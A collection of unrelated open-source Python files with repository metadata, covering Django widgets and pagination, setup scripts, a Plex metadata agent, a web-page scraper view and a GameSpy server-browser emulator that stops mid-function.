"IAC Driver Bus 1",
TRANSPOSITION_MAP)
nanopad_transposer.run()
midi.quit()
|
aoeu/python-examples
|
pyportmidi_examples/transpose_midi.py
|
Python
|
mit
| 845
|
"""empty message
Revision ID: 92d260834de
Revises: None
Create Date: 2014-07-13 13:46:53.505094
"""
# revision identifiers, used by Alembic.
revision = '92d260834de'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('title',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title_number', sa.String(length=9), nullable=True),
sa.Column('address', sa.String(length=1000), nullable=True),
sa.Column('post_code', sa.String(length=25), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('title_number')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('title')
### end Alembic commands ###
|
LandRegistry/public-titles
|
migrations/versions/92d260834de_.py
|
Python
|
mit
| 853
|
# This file is part of the Frescobaldi project, http://www.frescobaldi.org/
#
# Copyright (c) 2008 - 2016 by Wilbert Berendsen
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# See http://www.gnu.org/licenses/ for more information.
"""
All kinds of more or less generally usable Qt gadgets.
Most of them interact with Qt widgets, filtering events,
customizing behaviour etc.
These modules only depend on PyQt.
"""
|
dliessi/frescobaldi
|
frescobaldi_app/gadgets/__init__.py
|
Python
|
gpl-2.0
| 1,075
|
# -*- coding: utf-8 -*-
# (C) 2017 Carlos Serra-Toro <carlos.serra@braintec-group.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from . import test_bank
from . import test_lsv_export_wizard
from . import test_dd_export_wizard
from . import test_lsv_dd
|
CompassionCH/l10n-switzerland
|
l10n_ch_lsv_dd/tests/__init__.py
|
Python
|
agpl-3.0
| 280
|
# coding=utf-8
from setuptools import setup
from setuptools.command.test import test
class TestHook(test):
def run_tests(self):
import nose
nose.main(argv=['nosetests', 'tests/', '-v', '--logging-clear-handlers'])
setup(
name='lxml-asserts',
version='0.1.2',
description='Handy functions for testing lxml etree objects for equality and compatibility',
url='https://github.com/SuminAndrew/lxml-asserts',
author='Andrew Sumin',
author_email='sumin.andrew@gmail.com',
classifiers=[
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Testing',
],
license="http://www.apache.org/licenses/LICENSE-2.0",
cmdclass={
'test': TestHook
},
packages=[
'lxml_asserts'
],
install_requires=[
'lxml',
],
test_suite='tests',
tests_require=[
'nose',
'pycodestyle == 2.3.1'
],
zip_safe=False
)
|
SuminAndrew/lxml-asserts
|
setup.py
|
Python
|
apache-2.0
| 1,329
|
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
import json
from django.forms import HiddenInput, Widget
from django.utils.encoding import force_text
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from filer.models import File
from shuup.admin.utils.forms import flatatt_filter
from shuup.admin.utils.urls import get_model_url, NoModelUrl
from shuup.core.models import Contact, PersonContact, Product, ProductMode
class BasePopupChoiceWidget(Widget):
browse_kind = None
filter = None
def __init__(self, attrs=None, clearable=False, empty_text=u"\u2014"):
self.clearable = clearable
self.empty_text = empty_text
super(BasePopupChoiceWidget, self).__init__(attrs)
def get_browse_markup(self):
icon = "<i class='fa fa-folder'></i>"
return "<button class='browse-btn btn btn-info btn-sm' type='button'>%(icon)s %(text)s</button>" % {
"icon": icon,
"text": _("Browse")
}
def get_clear_markup(self):
icon = "<i class='fa fa-cross'></i>"
return "<button class='clear-btn btn btn-default btn-sm' type='button'>%(icon)s %(text)s</button>" % {
"icon": icon,
"text": _("Clear")
}
def render_text(self, obj):
url = getattr(obj, "url", None)
text = self.empty_text
if obj:
text = force_text(obj)
if not url:
try:
url = get_model_url(obj)
except NoModelUrl:
pass
if not url:
url = "#"
return mark_safe("<a class=\"browse-text\" href=\"%(url)s\" target=\"_blank\">%(text)s</a> " % {
"text": escape(text),
"url": escape(url),
})
def get_object(self, value):
raise NotImplementedError("Not implemented")
def render(self, name, value, attrs=None):
if value:
obj = self.get_object(value)
else:
obj = None
pk_input = HiddenInput().render(name, value, attrs)
media_text = self.render_text(obj)
bits = [self.get_browse_markup(), pk_input, " ", media_text]
if self.clearable:
bits.insert(1, self.get_clear_markup())
return mark_safe("<div %(attrs)s>%(content)s</div>" % {
"attrs": flatatt_filter({
"class": "browse-widget %s-browse-widget" % self.browse_kind,
"data-browse-kind": self.browse_kind,
"data-clearable": self.clearable,
"data-empty-text": self.empty_text,
"data-filter": self.filter
}),
"content": "".join(bits)
})
class MediaChoiceWidget(BasePopupChoiceWidget):
browse_kind = "media"
def get_object(self, value):
return File.objects.get(pk=value)
class ImageChoiceWidget(MediaChoiceWidget):
filter = "images"
class ProductChoiceWidget(BasePopupChoiceWidget):
browse_kind = "product"
def get_object(self, value):
return Product.objects.get(pk=value)
class ContactChoiceWidget(BasePopupChoiceWidget):
browse_kind = "contact"
def get_object(self, value):
return Contact.objects.get(pk=value)
def get_browse_markup(self):
icon = "<i class='fa fa-user'></i>"
return "<button class='browse-btn btn btn-info btn-sm' type='button'>%(icon)s %(text)s</button>" % {
"icon": icon,
"text": _("Select")
}
class PersonContactChoiceWidget(ContactChoiceWidget):
@property
def filter(self):
return json.dumps({"groups": [PersonContact.get_default_group().pk]})
class PackageProductChoiceWidget(ProductChoiceWidget):
filter = json.dumps({"modes": [ProductMode.NORMAL.value, ProductMode.VARIATION_CHILD.value]})
|
suutari/shoop
|
shuup/admin/forms/widgets.py
|
Python
|
agpl-3.0
| 4,135
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def get_version(*file_paths):
"""Retrieves the version from unach_photo_server/__init__.py"""
filename = os.path.join(os.path.dirname(__file__), *file_paths)
version_file = open(filename).read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError('Unable to find version string.')
version = get_version("unach_photo_server", "__init__.py")
if sys.argv[-1] == 'publish':
try:
import wheel
print("Wheel version: ", wheel.__version__)
except ImportError:
print('Wheel library missing. Please run "pip install wheel"')
sys.exit()
os.system('python setup.py sdist upload')
os.system('python setup.py bdist_wheel upload')
sys.exit()
if sys.argv[-1] == 'tag':
print("Tagging the version on git:")
os.system("git tag -a %s -m 'version %s'" % (version, version))
os.system("git push --tags")
sys.exit()
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
setup(
name='unach-photo-server',
version=version,
description="""Aplicación web encargada de conectar con los repositorios de fotografías dispersos en la unach y generar servicios web para consultar por las fotografías de usuarios.""",
long_description=readme + '\n\n' + history,
author='Javier Huerta',
author_email='javierhuerta@unach.cl',
url='https://github.com/javierhuerta/unach-photo-server',
packages=[
'unach_photo_server',
],
include_package_data=True,
install_requires=["django-model-utils>=2.0", "MySQL-python>=1.2.5", "pysmb>=1.1.19"],
license="MIT",
zip_safe=False,
keywords='unach-photo-server',
classifiers=[
'Development Status :: 3 - Alpha',
'Framework :: Django',
'Framework :: Django :: 1.10',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
)
|
javierhuerta/unach-photo-server
|
setup.py
|
Python
|
mit
| 2,500
|
from functools import reduce
from operator import or_
from chamber.shortcuts import get_object_or_none
from django.db.models import Q
from django.db.models.expressions import OrderBy
from django.utils.translation import ugettext
from .forms import RestValidationError
from .exception import RestException
from .utils.compatibility import get_last_parent_pk_field_name
from .utils.helpers import ModelIterableIteratorHelper
from .response import HeadersResponse
def _get_attr(obj, attr):
if '__' in attr:
rel_obj, rel_attr = attr.split('__')
return _get_attr(getattr(obj, rel_obj), rel_attr)
else:
return getattr(obj, attr)
class BasePaginator:
def get_response(self, qs, request):
raise NotImplementedError
class BaseModelOffsetBasedPaginator(BasePaginator):
iterable_helper_class = ModelIterableIteratorHelper
def __init__(self, max_offset=pow(2, 63) - 1, max_base=100, default_base=20):
self.max_offset = max_offset
self.max_base = max_base
self.default_base = default_base
def _get_model(self, qs):
raise NotImplementedError
def _get_list_from_queryset(self, qs, from_, to_):
raise NotImplementedError
def _get_total(self, qs, request):
raise NotImplementedError
def _get_offset(self, qs, request):
offset = request._rest_context.get('offset', '0')
if offset.isdigit():
offset_int = int(offset)
if offset_int > self.max_offset:
                raise RestException(ugettext('Offset must be lower than or equal to {}').format(self.max_offset))
else:
return offset_int
else:
            raise RestException(ugettext('Offset must be a natural number'))
def _get_base(self, qs, request):
base = request._rest_context.get('base')
if not base:
return self.default_base
elif base.isdigit():
base_int = int(base)
if base_int > self.max_base:
                raise RestException(ugettext('Base must be lower than or equal to {}').format(self.max_base))
else:
return base_int
else:
            raise RestException(ugettext('Base must be a natural number or empty'))
def _get_next_offset(self, iterable, offset, base):
return offset + base if len(iterable) > base else None
def _get_prev_offset(self, iterable, offset, base):
return None if offset == 0 or not base else max(offset - base, 0)
def _get_headers(self, total, next_offset, prev_offset):
return {
k: v for k, v in {
'X-Total': total,
'X-Next-Offset': next_offset,
'X-Prev-Offset': prev_offset,
}.items() if v is not None
}
def get_response(self, qs, request):
base = self._get_base(qs, request)
total = self._get_total(qs, request)
offset = self._get_offset(qs, request)
model = self._get_model(qs)
# To check next offset, one more object is get from queryset
iterable = self._get_list_from_queryset(qs, offset, offset + base + 1)
next_offset = self._get_next_offset(iterable, offset, base)
prev_offset = self._get_prev_offset(iterable, offset, base)
return HeadersResponse(
self.iterable_helper_class(iterable[:base], model),
self._get_headers(total, next_offset, prev_offset)
)
class DjangoOffsetBasedPaginator(BaseModelOffsetBasedPaginator):
"""
REST paginator for list and querysets
"""
def _get_model(self, qs):
return qs.model
def _get_list_from_queryset(self, qs, from_, to_):
return list(qs[from_:to_])
def _get_total(self, qs, request):
return qs.count()
class DjangoOffsetBasedPaginatorWithoutTotal(DjangoOffsetBasedPaginator):
def _get_total(self, qs, request):
return None
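# A minimal usage sketch (not part of the original module): the paginators
# read 'offset' and 'base' from ``request._rest_context`` (built by pyston)
# and wrap the page in a HeadersResponse carrying the X-Total, X-Next-Offset
# and X-Prev-Offset headers assembled by _get_headers(). The model and the
# request object below are hypothetical stand-ins.
#
#     paginator = DjangoOffsetBasedPaginator(default_base=20)
#     # request._rest_context == {'offset': '40', 'base': '20'}
#     response = paginator.get_response(Article.objects.all(), request)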
class CursorBasedModelIterableIteratorHelper(ModelIterableIteratorHelper):
def __init__(self, iterable, model, next):
super().__init__(iterable, model)
self.next = next
class DjangoCursorBasedPaginator(BasePaginator):
def __init__(self, max_base=100, default_base=20):
self.max_base = max_base
self.default_base = default_base
def get_response(self, qs, request):
base = self._get_base(request)
cursor = self._get_cursor(request)
ordering = self._get_ordering(request, qs)
cursor_based_model_iterable = self._get_paged_qs(qs, ordering, cursor, base)
return HeadersResponse(
cursor_based_model_iterable,
self.get_headers(cursor_based_model_iterable.next)
)
def _get_page_filter_kwargs(self, current_row, ordering):
ordering = list(ordering)
args_or = []
while ordering:
base_order_field_name = ordering.pop()
is_reverse = base_order_field_name.startswith('-')
base_order_field_name = self._get_field_name(base_order_field_name)
base_order_filtered_value = _get_attr(current_row, base_order_field_name)
if base_order_filtered_value is None:
if is_reverse:
filter_lookup = Q(**{'{}__isnull'.format(base_order_field_name): False})
else:
# skip this filter
continue
else:
if is_reverse:
filter_lookup = Q(
**{'{}__lt'.format(base_order_field_name): base_order_filtered_value}
)
else:
filter_lookup = Q(
**{'{}__gt'.format(base_order_field_name): base_order_filtered_value}
) | Q(
**{'{}__isnull'.format(base_order_field_name): True}
)
args_or.append(
Q(
filter_lookup,
Q(**{
self._get_field_name(order): _get_attr(
current_row, self._get_field_name(order)
) for order in ordering
})
)
)
return reduce(or_, args_or)
def _get_page(self, qs, base):
results = list(qs[:base + 1])
page = list(results[:base])
next_cursor = self._get_position_from_instance(page[-1]) if len(results) > len(page) else None
return CursorBasedModelIterableIteratorHelper(page, qs.model, next=next_cursor)
    def _get_paged_qs(self, qs, ordering, cursor, base):
        qs = qs.order_by(*ordering)
        if cursor:
            current_row = get_object_or_none(qs, pk=cursor)
            if current_row:
                # Pass the ordering along so the page filter can build lookups
                # for every order field, not just the cursor row's primary key.
                qs = qs.filter(self._get_page_filter_kwargs(current_row, ordering))
else:
raise RestException(RestValidationError(ugettext('Cursor object was not found')))
return self._get_page(qs, base)
def _get_base(self, request):
base = request._rest_context.get('base')
if not base:
return self.default_base
elif base.isdigit():
base_int = int(base)
if base_int > self.max_base:
                raise RestException(ugettext('Base must be lower than or equal to {}').format(self.max_base))
else:
return base_int
else:
            raise RestException(ugettext('Base must be a natural number or empty'))
def _get_cursor(self, request):
return request._rest_context.get('cursor')
def _get_ordering(self, request, qs):
pk_field_name = get_last_parent_pk_field_name(qs.model)
query_ordering = list(qs.query.order_by) or list(qs.model._meta.ordering)
ordering = []
for order_lookup in query_ordering:
if isinstance(order_lookup, OrderBy):
ordering.append(
'-' + order_lookup.expression.name if order_lookup.descending else order_lookup.expression.name
)
else:
ordering.append(order_lookup)
        if pk_field_name not in ordering:
ordering.append(pk_field_name)
return ordering
def _get_position_from_instance(self, instance):
pk_field_name = get_last_parent_pk_field_name(instance.__class__)
if isinstance(instance, dict):
attr = instance[pk_field_name]
else:
attr = getattr(instance, pk_field_name)
return str(attr)
def _get_field_name(self, order_lookup):
return order_lookup[1:] if order_lookup.startswith('-') else order_lookup
def get_headers(self, next_cursor):
return {
k: v for k, v in {
'X-Next-Cursor': next_cursor,
}.items() if v is not None
}
|
druids/django-pyston
|
pyston/paginator.py
|
Python
|
bsd-3-clause
| 8,855
|
from django.http import HttpResponseForbidden
from cloud_ide.fiddle.jsonresponse import JsonResponse
import urllib2, base64, urlparse
from HTMLParser import HTMLParseError
from bs4 import BeautifulSoup as BS
def scrape(request):
url = request.GET['url']
if not urlparse.urlparse(url).scheme[0:4] == 'http':
return HttpResponseForbidden()
response_dict = {}
success = False
try:
response = urllib2.urlopen(url)
html = response.read(200000) #200 kiloBytes
document = BS(html)
body = str(document.body)
resources = []
inlineJavascriptBlocks = []
inlineCssBlocks = []
for styleSheet in document.findAll('link', attrs={'rel': 'stylesheet'}):
resources.append(styleSheet.get('href'))
for style in document.findAll('style'):
inlineCssBlocks.append(style.string)
scripts = document.findAll('script')
for script in scripts:
externalJavascriptSource = script.get('src', None)
if externalJavascriptSource:
resources.append(externalJavascriptSource)
else:
# if script is not a template
scriptType = script.get('type', None)
                if not scriptType or scriptType == 'text/javascript':
inlineJavascriptBlocks.append(script.string)
except urllib2.HTTPError:
response_dict.update({'error': 'HTTP Error 404: Not Found'})
except HTMLParseError:
response_dict.update({'error': 'malformed HTML'})
except urllib2.URLError:
response_dict.update({'error': 'service not available'})
else:
success = True
response_dict.update({
'resources': resources,
'inlineJavascriptBlocks': inlineJavascriptBlocks,
'inlineCssBlocks': inlineCssBlocks,
'body': base64.b64encode(body)
})
response_dict.update({'success': success})
return JsonResponse(response_dict)
|
yuguang/fiddlesalad
|
utility/views.py
|
Python
|
gpl-3.0
| 2,008
|
VIDEO_ENDPOINT = "https://www.giantbomb.com/api/video/%s/?api_key=%s&format=json"
def Start():
HTTP.CacheTime = CACHE_1DAY
def getJSON(video_guid):
video_guid = str(video_guid)
url = VIDEO_ENDPOINT % (video_guid, Prefs['api_key'])
return JSON.ObjectFromURL(url)['results']
class GiantBombAgent(Agent.Movies):
name = 'Giant Bomb'
languages = [Locale.Language.English]
primary_provider = True
accepts_from = ['com.plexapp.agents.localmedia']
contributes_to = ['com.plexapp.agents.localmedia']
def search(self, results, media, lang, manual):
parts = media.name.split()
video_guid = str(parts[0]) + '-' + str(parts[1])
obj = getJSON(video_guid)
year = obj['publish_date'].split("-")[0]
results.Append(MetadataSearchResult(
id=str(video_guid.split('-')[1]),
name=obj['name'],
year=year,
score=100,
lang=lang
))
def update(self, metadata, media, lang):
obj = getJSON(metadata.id)
metadata.collections = obj['video_type'].split(', ')
metadata.duration = obj['length_seconds'] * 1000
metadata.studio = 'Giant Bomb'
metadata.summary = obj['deck']
metadata.title = obj['name']
metadata.year = int(obj['publish_date'].split("-")[0])
members = cast.cast_from_deck(obj['deck'])
for member in members:
role = metadata.roles.new()
role.role = 'Self'
role.actor = member
image = obj['image']['super_url']
metadata.posters[image] = Proxy.Media(HTTP.Request(image).content)
|
tsigo/GiantBomb.bundle
|
Contents/Code/__init__.py
|
Python
|
mit
| 1,668
|
"""DWC Network Server Emulator
Copyright (C) 2014 polaris-
Copyright (C) 2014 msoucy
Copyright (C) 2015 Sepalani
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
I found an open source implementation of this exact server I'm trying to
emulate here: (use as reference later)
https://github.com/sfcspanky/Openspy-Core/blob/master/serverbrowsing/
"""
import logging
import socket
import traceback
from twisted.internet.protocol import Factory
from twisted.internet.endpoints import serverFromString
from twisted.protocols.basic import LineReceiver
from twisted.internet import reactor
from twisted.internet.error import ReactorAlreadyRunning
import gamespy.gs_utility as gs_utils
import other.utils as utils
import dwc_config
from multiprocessing.managers import BaseManager
logger = dwc_config.get_logger('GameSpyServerBrowserServer')
class ServerListFlags:
UNSOLICITED_UDP_FLAG = 1
PRIVATE_IP_FLAG = 2
CONNECT_NEGOTIATE_FLAG = 4
ICMP_IP_FLAG = 8
NONSTANDARD_PORT_FLAG = 16
NONSTANDARD_PRIVATE_PORT_FLAG = 32
HAS_KEYS_FLAG = 64
HAS_FULL_RULES_FLAG = 128
class GameSpyServerDatabase(BaseManager):
pass
GameSpyServerDatabase.register("get_server_list")
GameSpyServerDatabase.register("modify_server_list")
GameSpyServerDatabase.register("find_servers")
GameSpyServerDatabase.register("find_server_by_address")
GameSpyServerDatabase.register("add_natneg_server")
GameSpyServerDatabase.register("get_natneg_server")
GameSpyServerDatabase.register("delete_natneg_server")
address = dwc_config.get_ip_port('GameSpyServerBrowserServer')
class GameSpyServerBrowserServer(object):
def __init__(self, qr=None):
self.qr = qr
def start(self):
endpoint = serverFromString(
reactor, "tcp:%d:interface=%s" % (address[1], address[0])
)
conn = endpoint.listen(SessionFactory(self.qr))
try:
if not reactor.running:
reactor.run(installSignalHandlers=0)
except ReactorAlreadyRunning:
pass
class SessionFactory(Factory):
def __init__(self, qr):
logger.log(logging.INFO,
"Now listening for connections on %s:%d...",
address[0], address[1])
self.secret_key_list = gs_utils.generate_secret_keys("gslist.cfg")
# TODO: Prune server cache at some point
self.server_cache = {}
self.qr = qr
def buildProtocol(self, address):
return Session(address, self.secret_key_list, self.server_cache,
self.qr)
class Session(LineReceiver):
def __init__(self, address, secret_key_list, server_cache, qr):
self.setRawMode() # We're dealing with binary data so set to raw mode
self.address = address
# Don't waste time parsing every session, so just accept it from
# the parent
self.secret_key_list = secret_key_list
self.console = 0
self.server_cache = server_cache
self.qr = qr
self.own_server = None
self.buffer = []
manager_address = dwc_config.get_ip_port('GameSpyManager')
manager_password = ""
self.server_manager = GameSpyServerDatabase(address=manager_address,
authkey=manager_password)
self.server_manager.connect()
def log(self, level, msg, *args, **kwargs):
"""TODO: Use logger format"""
logger.log(level, "[%s:%d] " + msg,
self.address.host, self.address.port,
*args, **kwargs)
def rawDataReceived(self, data):
try:
# First 2 bytes are the packet size.
#
# Third byte is the command byte.
# According to Openspy-Core:
# 0x00 - Server list request
# 0x01 - Server info request
# 0x02 - Send message request
# 0x03 - Keep alive reply
# 0x04 - Map loop request (?)
# 0x05 - Player search request
#
# For Tetris DS, at the very least 0x00 and 0x02 need to be
# implemented.
self.buffer += data
while len(self.buffer) > 0:
packet_len = utils.get_short(self.buffer, 0, True)
packet = None
if len(self.buffer) >= packet_len:
packet = self.buffer[:packet_len]
self.buffer = self.buffer[packet_len:]
if packet is None:
# Don't have enough for the entire packet, break.
break
if packet[2] == '\x00': # Server list request
self.log(logging.DEBUG,
"Received server list request from %s:%s...",
self.address.host, self.address.port)
# This code is so... not python. The C programmer in me is
# coming out strong.
# TODO: Rewrite this section later?
idx = 3
list_version = ord(packet[idx])
idx += 1
encoding_version = ord(packet[idx])
idx += 1
game_version = utils.get_int(packet, idx)
idx += 4
query_game = utils.get_string(packet, idx)
idx += len(query_game) + 1
game_name = utils.get_string(packet, idx)
idx += len(game_name) + 1
challenge = ''.join(packet[idx:idx+8])
idx += 8
filter = utils.get_string(packet, idx)
idx += len(filter) + 1
fields = utils.get_string(packet, idx)
idx += len(fields) + 1
options = utils.get_int(packet, idx, True)
idx += 4
source_ip = 0
max_servers = 0
NO_SERVER_LIST = 0x02
ALTERNATE_SOURCE_IP = 0x08
LIMIT_RESULT_COUNT = 0x80
send_ip = False
if (options & LIMIT_RESULT_COUNT):
max_servers = utils.get_int(packet, idx)
elif (options & ALTERNATE_SOURCE_IP):
source_ip = utils.get_ip(packet, idx)
elif (options & NO_SERVER_LIST):
send_ip = True
if '\\' in fields:
fields = [x for x in fields.split('\\')
if x and not x.isspace()]
# print "%02x %02x %08x" % \
# (list_version, encoding_version, game_version)
# print "%s" % query_game
# print "%s" % game_name
# print "%s" % challenge
# print "%s" % filter
# print "%s" % fields
# print "%08x" % options
# print "%d %08x" % (max_servers, source_ip)
self.log(logging.DEBUG,
"list version: %02x / encoding version: %02x /"
" game version: %08x / query game: %s /"
" game name: %s / challenge: %s / filter: %s /"
" fields: %s / options: %08x / max servers: %d /"
" source ip: %08x",
list_version, encoding_version,
game_version, query_game,
game_name, challenge, filter,
fields, options, max_servers,
source_ip)
# Requesting ip and port of client, not server
if not filter and not fields or send_ip:
output = bytearray(
[int(x) for x in self.address.host.split('.')]
)
# Does this ever change?
output += utils.get_bytes_from_short(6500, True)
enc = gs_utils.EncTypeX()
output_enc = enc.encrypt(
self.secret_key_list[game_name],
challenge,
output
)
self.transport.write(bytes(output_enc))
self.log(logging.DEBUG,
"%s",
"Responding with own IP and game port...")
self.log(logging.DEBUG,
"%s",
utils.pretty_print_hex(output))
else:
self.find_server(query_game, filter, fields,
max_servers, game_name, challenge)
elif packet[2] == '\x02': # Send message request
packet_len = utils.get_short(packet, 0, True)
dest_addr = '.'.join(["%d" % ord(x) for x in packet[3:7]])
# What's the pythonic way to do this? unpack?
dest_port = utils.get_short(packet, 7, True)
dest = (dest_addr, dest_port)
self.log(logging.DEBUG,
"Received send message request from %s:%s to"
" %s:%d... expecting %d byte packet.",
self.address.host, self.address.port,
dest_addr, dest_port, packet_len)
self.log(logging.DEBUG,
"%s",
utils.pretty_print_hex(bytearray(packet)))
if packet_len == len(packet):
# Contains entire packet, send immediately.
self.forward_data_to_client(packet[9:], dest)
else:
self.log(logging.ERROR,
"%s",
"ERROR: Could not find entire packet.")
elif packet[2] == '\x03': # Keep alive reply
self.log(logging.DEBUG,
"Received keep alive from %s:%s...",
self.address.host, self.address.port)
else:
self.log(logging.DEBUG,
"Received unknown command (%02x) from %s:%s...",
ord(packet[2]),
self.address.host, self.address.port)
self.log(logging.DEBUG,
"%s",
utils.pretty_print_hex(bytearray(packet)))
except:
self.log(logging.ERROR,
"Unknown exception: %s",
traceback.format_exc())
def get_game_id(self, data):
game_id = data[5: -1]
return game_id
def get_server_list(self, game, filter, fields, max_count):
results = self.server_manager.find_servers(game, filter, fields,
max_count)
return results
def generate_server_list_header_data(self, address, fields):
output = bytearray()
# Write the address
output += bytearray([int(x) for x in address.host.split('.')])
# Write the port
output += utils.get_bytes_from_short(address.port, True)
# Write number of fields that will be returned.
key_count = len(fields)
output += utils.get_bytes_from_short(key_count)
if key_count != len(fields):
# For some reason we didn't get all of the expected data.
self.log(logging.WARNING,
"key_count[%d] != len(fields)[%d]",
key_count, len(fields))
self.log(logging.WARNING, "%s", fields)
# Write the fields
for field in fields:
output += bytearray(field) + '\0\0'
return output
def generate_server_list_data(self, address, fields, server_info,
finalize=False):
output = bytearray()
flags_buffer = bytearray()
if len(server_info) > 0:
# Start server loop here instead of including all of the fields
# and stuff again
flags = 0
if len(server_info) != 0:
# This condition is always true? Isn't it?
flags |= ServerListFlags.HAS_KEYS_FLAG
if "natneg" in server_info:
flags |= ServerListFlags.CONNECT_NEGOTIATE_FLAG
ip = utils.get_bytes_from_int_signed(
int(server_info['publicip']), self.console
)
flags_buffer += ip
flags |= ServerListFlags.NONSTANDARD_PORT_FLAG
if server_info['publicport'] != "0":
flags_buffer += utils.get_bytes_from_short(
int(server_info['publicport']), True
)
else:
flags_buffer += utils.get_bytes_from_short(
int(server_info['localport']), True
)
if "localip0" in server_info:
# How to handle multiple localips?
flags |= ServerListFlags.PRIVATE_IP_FLAG
flags_buffer += bytearray(
[int(x) for x in server_info['localip0'].split('.')]
) # IP
if "localport" in server_info:
flags |= ServerListFlags.NONSTANDARD_PRIVATE_PORT_FLAG
flags_buffer += utils.get_bytes_from_short(
int(server_info['localport']), True
)
flags |= ServerListFlags.ICMP_IP_FLAG
flags_buffer += bytearray(
[int(x) for x in "0.0.0.0".split('.')]
)
output += bytearray([flags & 0xff])
output += flags_buffer
if (flags & ServerListFlags.HAS_KEYS_FLAG):
# Write data for associated fields
if 'requested' in server_info:
for field in fields:
output += '\xff' + \
bytearray(
server_info['requested'][field]
) + '\0'
return output
def find_server(self, query_game, filter, fields, max_servers, game_name,
challenge):
def send_encrypted_data(self, challenge, data):
self.log(logging.DEBUG,
"Sent server list message to %s:%s...",
self.address.host, self.address.port)
self.log(logging.DEBUG, "%s", utils.pretty_print_hex(data))
# Encrypt data
enc = gs_utils.EncTypeX()
data = enc.encrypt(self.secret_key_list[game_name],
challenge, data)
# Send to client
self.transport.write(bytes(data))
# OpenSpy's max packet length, just go with it for now
max_packet_length = 256 + 511 + 255
# Get dictionary from master server list server.
self.log(logging.DEBUG,
"Searching for server matching '%s' with the fields '%s'",
filter, fields)
self.server_list = self.server_manager.find_servers(
query_game, filter, fields, max_servers
)._getvalue()
self.log(logging.DEBUG, "%s", "Found server(s):")
self.log(logging.DEBUG, "%s", self.server_list)
if not self.server_list:
self.server_list = [{}]
data = self.generate_server_list_header_data(self.address, fields)
for i in range(0, len(self.server_list)):
server = self.server_list[i]
if server and fields and 'requested' in server and \
not server['requested']:
# If the requested fields weren't found then don't return
# a server. This fixes a bug with Mario Kart DS.
# print "Requested was empty"
server = {}
if "__console__" in server:
self.console = int(server['__console__'])
# Generate binary server list data
data += self.generate_server_list_data(
self.address, fields, server, i >= len(self.server_list)
)
if len(data) >= max_packet_length:
send_encrypted_data(self, challenge, data)
data = bytearray()
# if "publicip" in server and "publicport" in server:
# self.server_cache[str(server['publicip']) + \
# str(server['publicport'])] = server
data += '\0'
data += utils.get_bytes_from_int(0xffffffff)
send_encrypted_data(self, challenge, data)
def find_server_in_cache(self, addr, port, console):
ip = str(utils.get_ip(
bytearray([int(x) for x in addr.split('.')]),
0,
console
))
server = self.server_manager.find_server_by_address(ip,
port)._getvalue()
self.log(logging.DEBUG,
"find_server_in_cache is returning: %s %s",
server, ip)
return server, ip
def forward_data_to_client(self, data, forward_client):
# Find session id of server
# Iterate through the list of servers sent to the client and match by
# IP and port. Is there a better way to determine this information?
if forward_client is None or len(forward_client) != 2:
return
server, ip = self.find_server_in_cache(forward_client[0],
forward_client[1], self.console)
if server is None:
if self.console == 0:
server, ip = self.find_server_in_cache(forward_client[0],
forward_client[1],
1) # Try Wii
elif self.console == 1:
server, ip = self.find_server_in_cache(forward_client[0],
forward_client[1],
0) # Try DS
self.log(logging.DEBUG,
"find_server_in_cache returned: %s",
server)
self.log(logging.DEBUG,
"Trying to send message to %s:%d...",
forward_client[0], forward_client[1])
self.log(logging.DEBUG, "%s", utils.pretty_print_hex(bytearray(data)))
if server is None:
return
self.log(logging.DEBUG, "%s %s", ip, server['publicip'])
if server['publicip'] == ip and \
server['publicport'] == str(forward_client[1]):
if forward_client[1] == 0 and 'localport' in server:
# No public port returned from client, try contacting on
# the local port.
forward_client = (forward_client[0], int(server['localport']))
# Send command to server to get it to connect to natneg
# Quick and lazy way to get a random 32bit integer. Replace with
# something else later
cookie = int(utils.generate_random_hex_str(8), 16)
# if (len(data) == 24 and bytearray(data)[0:10] == \
# bytearray([0x53, 0x42, 0x43, 0x4d, 0x03,
# 0x00, 0x00, 0x00, 0x01, 0x04])) or \
# (len(data) == 40 and bytearray(data)[0:10] == \
# bytearray([0x53, 0x42, 0x43, 0x4d,
